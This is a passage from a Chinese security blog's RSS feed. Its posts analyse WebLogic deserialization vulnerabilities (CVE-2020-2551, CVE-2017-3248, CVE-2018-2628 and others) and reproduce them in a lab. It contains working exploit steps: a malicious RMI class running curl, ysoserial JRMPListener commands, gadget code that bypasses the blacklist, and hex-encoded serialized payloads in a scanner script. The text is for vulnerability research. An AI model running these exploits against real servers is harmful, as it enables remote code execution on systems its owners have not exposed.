<img src="/wp-content/uploads/2020/02/20200228176407.png" alt="image" /></p>
<p>到此之后就是Weblogic的CVE-2018-3191 spring JNDI注入了，简单来说就是lookup()的参数可控，导致可以加载任意类。我们继续跟进initUserTransactionAndTransactionManager()<br />
<img src="/wp-content/uploads/2020/02/20200228172797.png" alt="image" /></p>
<p>如果userTransaction等于空有userTransactionName属性则进入lookupUserTransaction()，跟进<br />
<img src="/wp-content/uploads/2020/02/20200228171163.png" alt="image" /></p>
<p>此时lookup()参数可控<br />
<img src="/wp-content/uploads/2020/02/20200228170996.png" alt="image" /></p>
<p>lookup加载我们的RMI服务，可以注入恶意ip的rmi服务，触发实例化恶意类构造方法调用。如果不明白请参考文末的《Spring framework 反序列化的漏洞》以及《weblogic之CVE-2018-3191漏洞分析》。</p>
<h2>漏洞利用</h2>
<p>Github：https://github.com/Y4er/CVE-2020-2551</p>
<p>下载jar包，然后使用marshalsec起一个恶意的RMI服务，本地编译一个exp.java</p>
<pre><code class="language-java ">package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p><strong>尽量使用和weblogic相同的版本编译</strong> 然后本地起一个web服务器</p>
<pre><code class="">python -m http.server --bind 0.0.0.0 80
</code></pre>
<p>命令行运行jar包</p>
<pre><code class="">java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
</code></pre>
<p>实际效果如图<br />
<img src="/wp-content/uploads/2020/02/20200228174168.gif" alt="image" /></p>
<h2>参考链接</h2>
<ol>
<li>https://paper.seebug.org/1130</li>
<li>https://seaii-blog.com/index.php/2019/12/29/92.html</li>
<li>https://www.anquanke.com/post/id/197605</li>
<li>https://www.cnblogs.com/afanti/p/10256843.html</li>
<li>https://www.cnblogs.com/afanti/p/10193169.html</li>
<li>https://github.com/Y4er/CVE-2020-2551</li>
<li>https://github.com/longofo/rmi-jndi-ldap-jrmp-jmx-jms</li>
<li>https://paper.seebug.org/1105/</li>
<li>https://paper.seebug.org/1091/</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>/audit/1282.html/feed</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Weblogic JRMP反序列化及绕过分析</title>
		<link>/audit/1275.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 27 Feb 2020 07:15:27 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[JRMP]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1275</guid>

					<description><![CDATA[前言 JRMP是Java使用的另一种数据传输协议，在前文中提到了传输过程中会自动序列化和反序列化，因此weblogic出现了一系列的漏洞，即CVE-2017-3248、CVE-20...]]></description>
										<content:encoded><![CDATA[<h2>前言</h2>
<p><span class="wpcom_tag_link"><a href="/tags/jrmp" title="JRMP" target="_blank">JRMP</a></span>是Java使用的另一种数据传输协议，在前文中提到了传输过程中会自动序列化和<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>，因此<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>出现了一系列的漏洞，即CVE-2017-3248、CVE-2018-2628、CVE-2018-2893、CVE-2018-3245，众所周知weblogic打补丁的形式为黑名单，所以CVE-2017-3248之后的洞都为黑名单绕过，本文逐一讲解。</p>
<h2>CVE-2017-3248</h2>
<h3>复现</h3>
<p>因为本机没有python2，就直接在虚拟机里复现了。使用ysoserial监听JRMP服务</p>
<pre><code class="">./Oracle/Middleware/jdk160_29/jre/bin/java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8080 CommonsCollections1 'touch /tmp/success'
</code></pre>
<p><a class="wp-editor-md-post-content-link" href="https://www.exploit-db.com/exploits/44553">下载python版exp脚本</a> ，运行</p>
<pre><code class="">python 44553.py 172.16.2.129 7001 ./ysoserial.jar 172.16.2.129 8080 JRMPClient
</code></pre>
<p>成功创建/tmp/success文件<br />
<img src="https://y4er.com/img/uploads/20200226205381.png" alt="image" /></p>
<h3>分析</h3>
<p>JRMP在前文中提到了在传输过程中也会自动序列化和反序列化，那么我们可以构造一个gadgets，通过T3协议让weblogic自动请求我们的JRMPListener，然后JRMPListener返回给他一个恶意的gadgets对象，weblogic自动反序列化恶意对象，达到<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>。</p>
<p>过程如图<br />
<img src="/wp-content/uploads/2020/02/20200226201443.png" alt="image" /></p>
<p>整个构造需要两步<br />
1. 构造T3协议的payload，让weblogic请求我们的JRMP -> 复现中的python脚本<br />
2. 构造JRMPListener返回的gadgets                                -> 复现时监听JRMPListener</p>
<p>看下python脚本，发现脚本中是使用ysoserial生成payload.out，然后读出hex构造t3发包<br />
<img src="/wp-content/uploads/2020/02/20200226206003.png" alt="image" /></p>
<p>看下JRMPClient.<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>的代码<br />
<img src="/wp-content/uploads/2020/02/20200226200969.png" alt="image" /></p>
<p>利用java.rmi.registry.Registry，序列化RemoteObjectInvocationHandler，并使用UnicastRef和远端建立tcp连接，获取RMI registry，序列化之后发送给weblogic，weblogic会请求我们的JRMPListener，然后将获取的内容利用readObject()进行解析，导致恶意代码执行。</p>
<h3>改造weblogic_cmd</h3>
<p>BypassPayloadSelector.java</p>
<pre><code class="language-java ">public static Object selectBypass(Object payload) throws Exception {

    if (Main.TYPE.equalsIgnoreCase("marshall")) {
        payload = marshalledObject(payload);
    } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
        payload = streamMessageImpl(Serializables.serialize(payload));
    }else if(Main.TYPE.equalsIgnoreCase("JRMPListener")){
        payload = JRMPListener(cmdLine.getOptionValue("H")+":"+ cmdLine.getOptionValue("P"));
    }
    return payload;
}

public static Registry JRMPListener(String command) throws Exception {

    String host;
    int port;
    int sep = command.indexOf(':');
    if (sep &lt; 0) {
        port = new Random().nextInt(65535);
        host = command;
    } else {
        host = command.substring(0, sep);
        port = Integer.valueOf(command.substring(sep + 1));
    }
    ObjID id = new ObjID(new Random().nextInt()); // RMI registry
    TCPEndpoint te = new TCPEndpoint(host, port);
    UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
    RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
    Registry proxy = (Registry) Proxy.newProxyInstance(BypassPayloadSelector.class.getClassLoader(), new Class[]{
        Registry.class
            }, obj);
    return proxy;
}
</code></pre>
<p>weblogic_cmd是一个很方便发送t3协议数据的工具，改了改通过参数-T来指定JRMPClient，加了一个JRMPClient方法，仍然需要用ysoserial.jar监听JRMPListener。</p>
<pre><code class="">java -cp yso.jar ysoserial.exploit.JRMPListener 8080 CommonsCollections1 "curl http://172.16.1.1/"
</code></pre>
<h2>CVE-2018-2628</h2>
<p>先看CVE-2017-3248的补丁</p>
<pre><code class="language-java ">protected Class&lt;?&gt; resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
    String[] arr$ = interfaces;
    int len$ = interfaces.length;

    for(int i$ = 0; i$ &lt; len$; ++i$) {
        String intf = arr$[i$];
        if (intf.equals("java.rmi.registry.Registry")) {
            throw new InvalidObjectException("Unauthorized proxy deserialization");
        }
    }

    return super.resolveProxyClass(interfaces);
}
</code></pre>
<p>思路一：resolveProxyClass反序列化代理类才会调用，直接反序列化UnicastRef对象，调用sun.rmi.server.UnicastRef#readExternal。</p>
<pre><code class="language-java ">public Registry getObject(final String command) throws Exception {

    String host;
    int port;
    int sep = command.indexOf(':');
    if (sep &lt; 0) {
        port = new Random().nextInt(65535);
        host = command;
    } else {
        host = command.substring(0, sep);
        port = Integer.valueOf(command.substring(sep + 1));
    }
    ObjID id = new ObjID(new Random().nextInt()); // RMI registry
    TCPEndpoint te = new TCPEndpoint(host, port);
    UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
    return ref;
}
</code></pre>
<p>这样绕过之后补丁把UnicastRef加入了黑名单。</p>
<p>思路二：使用java.rmi.registry.Registry之外的类。廖新喜用的<code>java.rmi.activation.Activator</code></p>
<pre><code class="language-java ">public Registry getObject(final String command) throws Exception {
    String host;
    int port;
    int sep = command.indexOf(':');
    if (sep &lt; 0) {
        port = new Random().nextInt(65535);
        host = command;
    } else {
        host = command.substring(0, sep);
        port = Integer.valueOf(command.substring(sep + 1));
    }
    ObjID id = new ObjID(new Random().nextInt()); // RMI registry
    TCPEndpoint te = new TCPEndpoint(host, port);
    UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
    RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
    Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient3.class.getClassLoader(), new Class[] {
        Activator.class
            }, obj);
    return proxy;
}
</code></pre>
<h2>CVE-2018-2893</h2>
<p>由于weblogic一直没有处理streamMessageImpl，导致CVE-2016-0638 + CVE-2018-2628 = CVE-2018-2893，用streamMessageImpl封装一下而已。</p>
<h2>CVE-2018-3245</h2>
<p>RMIConnectionImpl_Stub代替RemoteObjectInvocationHandler，实际上就是找RemoteObject类的子类。https://github.com/pyn3rd/CVE-2018-3245</p>
<h2>总结</h2>
<p>一切罪恶的源头都是T3协议，weblogic还是禁用T3协议为好。weblogic黑名单补丁总是治标不治本，无奈的是补丁需要付费才能下载到。</p>
<h2>参考</h2>
<ol>
<li>https://www.cnblogs.com/afanti/p/10256840.html</li>
<li>https://seaii-blog.com/index.php/2019/12/29/92.html</li>
<li>https://github.com/pyn3rd/CVE-2018-2893</li>
<li>https://mp.weixin.qq.com/s/ohga7Husc9ke5UYuqR92og</li>
<li><a class="wp-editor-md-post-content-link" href="http://xxlegend.com/2018/06/20/CVE-2018-2628%20%E7%AE%80%E5%8D%95%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%86%E6%9E%90/">廖新喜 CVE-2018-2628 简单复现与分析</a></li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Weblogic CVE-2016-3510 MarshalledObject反序列化绕过分析</title>
		<link>/audit/1207.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 15 Feb 2020 17:13:19 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<category><![CDATA[审计]]></category>
		<guid isPermaLink="false">/?p=1207</guid>

					<description><![CDATA[Weblogic系列文章，还是绕过黑名单。 复现 https://github.com/5up3rc/weblogic_cmd 修改payload类型 成功执行命令，断点同样下在I...]]></description>
										<content:encoded><![CDATA[<p>Weblogic系列文章，还是绕过黑名单。<br />
<span id="more-1207"></span></p>
<h2>复现</h2>
<p>https://github.com/5up3rc/<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>_cmd 修改payload类型</p>
<p><img src="https://y4er.com/img/uploads/20200216011668.png" alt="image" /></p>
<p>成功执行命令，断点同样下在InvokerTransformer的transform()，堆栈如下。</p>
<pre><code class="">transform:123, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
get:157, LazyMap (org.apache.commons.collections.map)
invoke:50, AnnotationInvocationHandler (sun.reflect.annotation)
entrySet:-1, $Proxy57
readObject:327, AnnotationInvocationHandler (sun.reflect.annotation)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:39, NativeMethodAccessorImpl (sun.reflect)
invoke:25, DelegatingMethodAccessorImpl (sun.reflect)
invoke:597, Method (java.lang.reflect)
invokeReadObject:974, ObjectStreamClass (java.io)
readSerialData:1848, ObjectInputStream (java.io)
readOrdinaryObject:1752, ObjectInputStream (java.io)
readObject0:1328, ObjectInputStream (java.io)
readObject:350, ObjectInputStream (java.io)
readResolve:58, MarshalledObject (weblogic.corba.utils)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:39, NativeMethodAccessorImpl (sun.reflect)
invoke:25, DelegatingMethodAccessorImpl (sun.reflect)
invoke:597, Method (java.lang.reflect)
invokeReadResolve:1061, ObjectStreamClass (java.io)
readOrdinaryObject:1761, ObjectInputStream (java.io)
readObject0:1328, ObjectInputStream (java.io)
readObject:350, ObjectInputStream (java.io)
readObject:69, InboundMsgAbbrev (weblogic.rjvm)
read:41, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:283, MsgAbbrevJVMConnection (weblogic.rjvm)
init:215, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:498, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:330, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:394, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:960, SocketMuxer (weblogic.socket)
readReadySocket:897, SocketMuxer (weblogic.socket)
processSockets:130, PosixSocketMuxer (weblogic.socket)
run:29, SocketReaderRequest (weblogic.socket)
execute:42, SocketReaderRequest (weblogic.socket)
execute:145, ExecuteThread (weblogic.kernel)
run:117, ExecuteThread (weblogic.kernel)
</code></pre>
<p>用的common-collection1，MarshalledObject 在 (weblogic.corba.utils) 中 <code>WEB-INF\lib\weblogic.jar!\weblogic\corba\utils\MarshalledObject.class</code></p>
<h2>分析</h2>
<p>同样是绕过黑名单，将<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>的对象封装进了weblogic.corba.utils.MarshalledObject，然后再对MarshalledObject进行序列化，生成payload字节码。由于MarshalledObject不在WebLogic黑名单里，可正常反序列化，在反序列化时MarshalledObject对象调用readObject时对MarshalledObject封装的序列化对象再次反序列化，可以绕过黑名单的限制。</p>
<p>看下weblogic_cmd中如何构造的</p>
<p><img src="/wp-content/uploads/2020/02/20200216018369.png" alt="image" /></p>
<p>handler是构造的cc对象，进入BypassPayloadSelector.selectBypass()</p>
<p><img src="/wp-content/uploads/2020/02/20200216015027.png" alt="image" /></p>
<p>根据TYPE决定使用什么来构造payload，跟进到marshalledObject(payload)</p>
<p><img src="/wp-content/uploads/2020/02/20200216017587.png" alt="image" /></p>
<p>将构造的cc对象封装进MarshalledObject对象marshalledObject，然后return，进入Serializables.serialize(_handler)</p>
<p><img src="/wp-content/uploads/2020/02/20200216016245.png" alt="image" /></p>
<p>拿到序列化对象的字节码数组，然后通过t3协议发送出去，后面不再解释。</p>
<p>总的来说，就是将cc对象封装进MarshalledObject，MarshalledObject不在黑名单中，那么执行他的readObject()就可以触发cc链。</p>
<p>再来看下weblogic在哪触发的readObject()，断到MarshalledObject.class的48行。</p>
<p><img src="/wp-content/uploads/2020/02/20200216017844.png" alt="image" /></p>
<p>这里的readObject()触发反序列化，怎么进入到readResolve()这个方法的？查看堆栈进入invokeReadResolve()</p>
<p><img src="/wp-content/uploads/2020/02/20200216013218.png" alt="image" /></p>
<p>这里通过反射调用var1也就是MarshalledObject对象的readResolve()方法。var1中包含了我们恶意的序列化数据，它怎么传进来的？</p>
<p>进入堆栈中readOrdinaryObject()</p>
<pre><code class="language-java ">private Object readOrdinaryObject(boolean var1) throws IOException {
    if (this.bin.readByte() != 115) {
        throw new InternalError();
    } else {
        ObjectStreamClass var2 = this.readClassDesc(false);
        var2.checkDeserialize();

        Object var3;
        try {
            var3 = var2.isInstantiable() ? var2.newInstance() : null;
        } catch (Exception var6) {
            throw (IOException)(new InvalidClassException(var2.forClass().getName(), "unable to create instance")).initCause(var6);
        }

        this.passHandle = this.handles.assign(var1 ? unsharedMarker : var3);
        ClassNotFoundException var4 = var2.getResolveException();
        if (var4 != null) {
            this.handles.markException(this.passHandle, var4);
        }

        if (var2.isExternalizable()) {
            this.readExternalData((Externalizable)var3, var2);
        } else {
            this.readSerialData(var3, var2);
        }

        this.handles.finish(this.passHandle);
        if (var3 != null &amp;&amp; this.handles.lookupException(this.passHandle) == null &amp;&amp; var2.hasReadResolveMethod()) {
            Object var5 = var2.invokeReadResolve(var3);
            if (var1 &amp;&amp; var5.getClass().isArray()) {
                var5 = cloneArray(var5);
            }

            if (var5 != var3) {
                var3 = var5;
                this.handles.setObject(this.passHandle, var5);
            }
        }

        return var3;
    }
}
</code></pre>
<p>在这里调用了invokeReadResolve()，参数var3在上文由this.readClassDesc()返回的var2调用newInstance()创建，即经t3协议传入的MarshalledObject对象，具体做了什么处理不深入研究。</p>
<h2>总结</h2>
<p>t3传入MarshalledObject对象 -> readOrdinaryObject() 拿到MarshalledObject对象 -> invokeReadResolve() 反射调用MarshalledObject对象的readResolve() -> readObject()触发cc反序列化。</p>
<h2>参考</h2>
<ol>
<li>jdk最好用1.6的，不然总是定位不到正确的函数。</li>
<li>https://www.cnblogs.com/afanti/p/10240232.html</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Weblogic CVE-2016-0638 StreamMessageImpl反序列化绕过分析</title>
		<link>/audit/1184.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 15 Feb 2020 17:10:17 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1184</guid>

					<description><![CDATA[打补丁 官方漏洞通报时发布了两个补丁，分别是 1. p22248372_1036012_Generic 2. p20780171_1036_Generic 后来集成为一个补丁 p2...]]></description>
										<content:encoded><![CDATA[<h2>打补丁</h2>
<p><a class="wp-editor-md-post-content-link" href="https://blog.csdn.net/zhouleiblog/article/details/50454925">官方漏洞通报时</a>发布了两个补丁，分别是<br />
1. <a class="wp-editor-md-post-content-link" href="https://updates.oracle.com/Orion/PatchDetails/handle_rel_change?release=8191036001202&amp;plat_lang=2000P&amp;aru=19587063&amp;patch_num=22248372&amp;patch_num_id=2365750">p22248372_1036012_Generic</a><br />
2. <a class="wp-editor-md-post-content-link" href="https://updates.oracle.com/Orion/PatchDetails/process_form?patch_num=20780171">p20780171_1036_Generic</a></p>
<p>后来集成为一个补丁 <a class="wp-editor-md-post-content-link" href="https://updates.oracle.com/Orion/PatchDetails/process_form?patch_num_id=&amp;patch_num=21984589&amp;release=8191036000&amp;plat_lang=2000P&amp;no_header=0&amp;">p21984589_1036_Generic</a> ，补丁下载需要Oracle的metalink账号也就是付费客户才可以下载，p21984589_1036_Generic 补丁我在网上没找到，只能退而求其次用两个补丁的方式了。</p>
<p>打补丁过程参考 <a class="wp-editor-md-post-content-link" href="https://www.twblogs.net/a/5b8dedca2b71771883419f60/zh-cn">weblogic10.3.6安装漏洞补丁</a></p>
<pre><code class="">chmod -R 775 p20780171_1036_Generic p22248372_1036012_Generic
cd /root/Oracle/Middleware/utils/bsu/
./bsu.sh -install -patch_download_dir=/root/p20780171_1036_Generic -patchlist=EJUW -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3
./bsu.sh -install -patch_download_dir=/root/p22248372_1036012_Generic/ -patchlist=ZLNA -prod_dir=/root/Oracle/Middleware/wlserver_10.3/
source ./Oracle/Middleware/wlserver_10.3/server/bin/setWLSEnv.sh
java weblogic.version
</code></pre>
<p>如果出现 <code>Java heap space</code> 错误，把bsu.sh里的MEM_ARGS参数改为 <code>-Xms512m -Xmx1024m</code> 就行了。</p>
<p><img src="https://y4er.com/img/uploads/20200201203719.png" alt="image" /></p>
<p>可以看到打的两个补丁。</p>
<p><img src="/wp-content/uploads/2020/02/20200201205005.png" alt="image" /></p>
<p>打了补丁之后使用CVE-2015-4852复现不成功，补丁确实有用。</p>
<p>查看<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>的日志<br />
<img src="/wp-content/uploads/2020/02/20200201202067.png" alt="image" /></p>
<p><code><span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.io.InvalidClassException: Unauthorized deserialization attempt; org.apache.commons.collections.functors.ChainedTransformer</code> 无效的类，可能是补丁做了<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>类黑名单校验。</p>
<h2>补丁里的黑名单</h2>
<p>网上的分析文章说是一个ClassFilter类设置了黑名单，我们搜索一下具体的位置。</p>
<p><img src="/wp-content/uploads/2020/02/20200201204039.png" alt="image" /></p>
<p><code>/root/Oracle/Middleware/patch_wls1036/patch_jars/BUG22248372_1036.jar</code> 在这个包中，将<code>Unauthorized deserialization attempt</code>关键字打断点，执行CVE-2015-4852发现断在weblogic.rjvm.InboundMsgAbbrev.ServerChannelInputStream#resolveClass这里。</p>
<p><img src="/wp-content/uploads/2020/02/20200201208769.png" alt="image" /></p>
<p>检查了反序列化的类，跟进isBlackListed()判断，发现了黑名单。</p>
<p><img src="/wp-content/uploads/2020/02/20200201204234.png" alt="image" /></p>
<p>接下来进入正文，引入CVE-2016-0638这个CVE。</p>
<h2>正文</h2>
<p>前面我们说了CVE-2015-4852是通过黑名单的形式来修复了漏洞，主要作用在wlthint3client.jar包中以下三个位置</p>
<pre><code class="">weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream
weblogic.rjvm.MsgAbbrevInputStream.class
weblogic.iiop.Utils.class
</code></pre>
<p>所以如果能找到可以在其readObject中创建自己的InputStream的对象，并且不是使用黑名单中的ServerChannelInputStream和MsgAbbrevInputStream的readObject进行的反序列化，最后调用readObject()方法进行反序列化的数据的读取，这样就可以执行含有恶意代码的序列化代码。然后就找到了weblogic.jms.common.StreamMessageImpl#readExternal</p>
<p><img src="/wp-content/uploads/2020/02/20200201207302.png" alt="image" /></p>
<p>使用payload打过去，发现var4是接收的反序列化数据，var5执行了反序列化操作，执行了我们的恶意代码。</p>
<h2>exp分析</h2>
<p>https://github.com/5up3rc/weblogic_cmd 克隆下来，idea打开，配置运行参数。</p>
<pre><code class="">-H "172.16.2.129" -C "ping -c 4 kaurg7.dnslog.cn" -B -os linux
</code></pre>
<p><img src="/wp-content/uploads/2020/02/20200201207243.png" alt="image" /></p>
<p>main方法中首先获取参数，然后进入executeBlind()</p>
<p><img src="/wp-content/uploads/2020/02/20200201206029.png" alt="image" /></p>
<p>然后进入WebLogicOperation.blindExecute()</p>
<p><img src="/wp-content/uploads/2020/02/20200201201776.png" alt="image" /></p>
<p>然后配置cmd，接着进入SerialDataGenerator.serialBlindDatas()</p>
<p><img src="/wp-content/uploads/2020/02/20200201202325.png" alt="image" /></p>
<p>接着进入构建反序列化对象</p>
<p><img src="/wp-content/uploads/2020/02/20200201206219.png" alt="image" /></p>
<p><img src="/wp-content/uploads/2020/02/20200201205244.png" alt="image" /></p>
<p>用的是common-collections1</p>
<p><img src="/wp-content/uploads/2020/02/20200201209268.png" alt="image" /></p>
<p>然后进入BypassPayloadSelector.selectBypass(handler) 通过参数决定，默认使用streamMessageImpl</p>
<p><img src="/wp-content/uploads/2020/02/20200201200272.png" alt="image" /></p>
<p>接着进入T3协议 <code>T3ProtocolOperation.send(host, port, payload)</code>，然后就是构造T3协议，发送出去。</p>
<p><img src="/wp-content/uploads/2020/02/20200201202412.png" alt="image" /></p>
<p>输出的pahse1Str就是我们自己构造的序列化数据，到此就执行命令成功了。</p>
<p><img src="/wp-content/uploads/2020/02/20200201208971.png" alt="image" /></p>
<p>还有一点就是输出的pahse1Str可以放到下面脚本中，直接用python更方便。</p>
<pre><code class="language-python ">#!/usr/bin/env python
#coding:utf-8
import socket
import time
import re
import argparse
from multiprocessing.dummy import Pool

VUL=['CVE-2016-0638',
    'CVE-2016-3510',
    'CVE-2017-3248',
    'CVE-2018-2628',
    'CVE-2018-2893'
    ]
PAYLOAD=['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',
    'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b42787057412418757200025b42acf317f8060854e0020000787000000c0daced0005737200176a6176612e7574696c2e4c696e6b656448617368536574d86cd75a95dd2a1e020000787200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000103f400000000000027372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000949000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785a00155f75736553657276696365734d656368616e69736d4c00195f61636365737345787465726e616c5374796c6573686565747400124c6a6176612f6c616e672f537472696e673b4c000b5f617578436c617373657374003b4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff00740003616c6c70757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e0020000787000000698cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7
401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01000463616c6308003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572313930393035393330363833303701001f4c79736f73657269616c2f50776e657231393039303539333036383330373b002100020003000100040001001a000500060001000700000002000800040001000a000
b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002e000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000033000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000037000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e000d000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003b000e